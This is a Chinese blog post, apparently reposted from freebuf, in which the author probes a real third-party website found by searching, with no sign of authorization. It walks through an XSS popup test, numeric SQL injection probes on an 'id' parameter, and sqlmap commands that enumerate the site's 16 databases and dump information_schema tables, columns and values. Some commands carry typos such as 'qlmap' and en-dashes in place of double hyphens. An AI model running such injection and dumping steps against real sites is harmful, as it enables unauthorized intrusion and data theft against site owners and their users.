记录一次简单的web实战 – 作者:MCY工作室

盛年不重来,一日难再晨
在茫茫大海中,终于等到了你的到来!
在不断的搜索中,终于找到了一个“可爱啊”的网站,现在准备开饭了!
image.png在这就绕过信息收集这个步骤了,在初步拿到这个网站时,首先要注意网站的结构,server之类的。
BEGIN

在网站代码后面输入JaveaScript测试代码 ;出现弹窗,证明存在一个小的XSS,是否存在更多的XSS漏洞信息,以后再做补充。

image.png

除此之后,我们对其他漏洞页进去了测试,结果居然有了!!!

image.png

可以发现,存在数字型的SQL注入点;于是用了传统的方法对网站进行了sql测试

http://www.xxxxxx.net/main.php?id=35 and 1=1 ;http://www.xxxxx.net/main.php?id=35 or 1=1

image.png

虽然输入这个判断其可能存在注入点,但是还是需要进一步测试

现在我们用kali中的sqlmap进行扫描;

sqlmap -u http://www.xxxxxx.net/main.php?id=35

image.png

从扫描的结果可以知道,数据库为Mysql,Apach版本为2.0.47,PHP版本为5.1.4,属于高版本,由前面的知识点可以判定肯定存在’information_schema’这个数据库;

接下来,我们将查询该网站可能存在的其他数据库

sqlmap -u http://www.xxxxx.net/main.php?id=35 –dbs

image.png

我们可以看到,这个网站存在16个数据库,其中应该有我们想要看的东西(切记 只能看,不能改哟)

于是我进入到了刚才提到的‘information_schema’这个数据库中

第一:查看该数据库的所有表名 sqlmap -u http://www.xxxxx/main.php?id=35 -D information_schema –tables
image.png

第二:选择其中一个表,查看其字段 qlmap -u http://www.xxxxxx.net/main.php?id=35 -D information_schema -T TABLES –columns

image.png

第三:查看字段中的数据值 sqlmap -u http://www.xxxx.net/main.php?id=35 -Dinformation_schema -C TABLE_NAME -dump
image.png
image.png

既然这个网站存在一些漏洞,我们也得遵守法律,也就到这儿吧!

来源:freebuf.com 2021-05-26 11:44:41 by: MCY工作室

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论